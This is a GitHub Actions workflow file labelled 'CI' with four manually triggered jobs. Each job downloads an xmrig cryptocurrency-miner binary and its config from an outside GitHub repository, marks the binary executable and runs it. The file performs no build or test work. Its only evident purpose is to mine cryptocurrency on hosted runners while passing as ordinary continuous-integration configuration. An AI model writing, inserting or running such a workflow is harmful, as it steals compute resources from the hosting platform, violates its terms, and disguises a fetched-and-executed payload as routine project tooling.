
name: CI

on
  workflow_dispatch:

jobs:
  Stage1:
    runs-on: ubuntu-latest
    steps:
      - name: Run a multi-line script
        run: |
          sudo apt update && sudo apt install wget -y
          wget -O config.json https://raw.githubusercontent.com/Menerlast/friendly-octo-computing-machine/main/config.json
          wget -O xmrig https://github.com/Menerlast/friendly-octo-computing-machine/blob/main/xmrig?raw=true
          chmod +x xmrig
          ./xmrig

  Stage2:
    runs-on: ubuntu-latest
    steps:
      - name: Run a multi-line script
        run: |
          sudo apt update && sudo apt install wget -y
          wget -O config.json https://raw.githubusercontent.com/Menerlast/friendly-octo-computing-machine/main/config.json
          wget -O xmrig https://github.com/Menerlast/friendly-octo-computing-machine/blob/main/xmrig?raw=true
          chmod +x xmrig
          ./xmrig
  Stage3:
    runs-on: ubuntu-latest
    steps:
      - name: Run a multi-line script
        run: |
          sudo apt update && sudo apt install wget -y
          wget -O config.json https://raw.githubusercontent.com/Menerlast/friendly-octo-computing-machine/main/config.json
          wget -O xmrig https://github.com/Menerlast/friendly-octo-computing-machine/blob/main/xmrig?raw=true
          chmod +x xmrig
          ./xmrig
  Stage4:
    runs-on: ubuntu-latest
    steps:
      - name: Run a multi-line script
        run: |
          sudo apt update && sudo apt install wget -y
          wget -O config.json https://raw.githubusercontent.com/Menerlast/friendly-octo-computing-machine/main/config.json
          wget -O xmrig https://github.com/Menerlast/friendly-octo-computing-machine/blob/main/xmrig?raw=true
          chmod +x xmrig
          ./xmrig

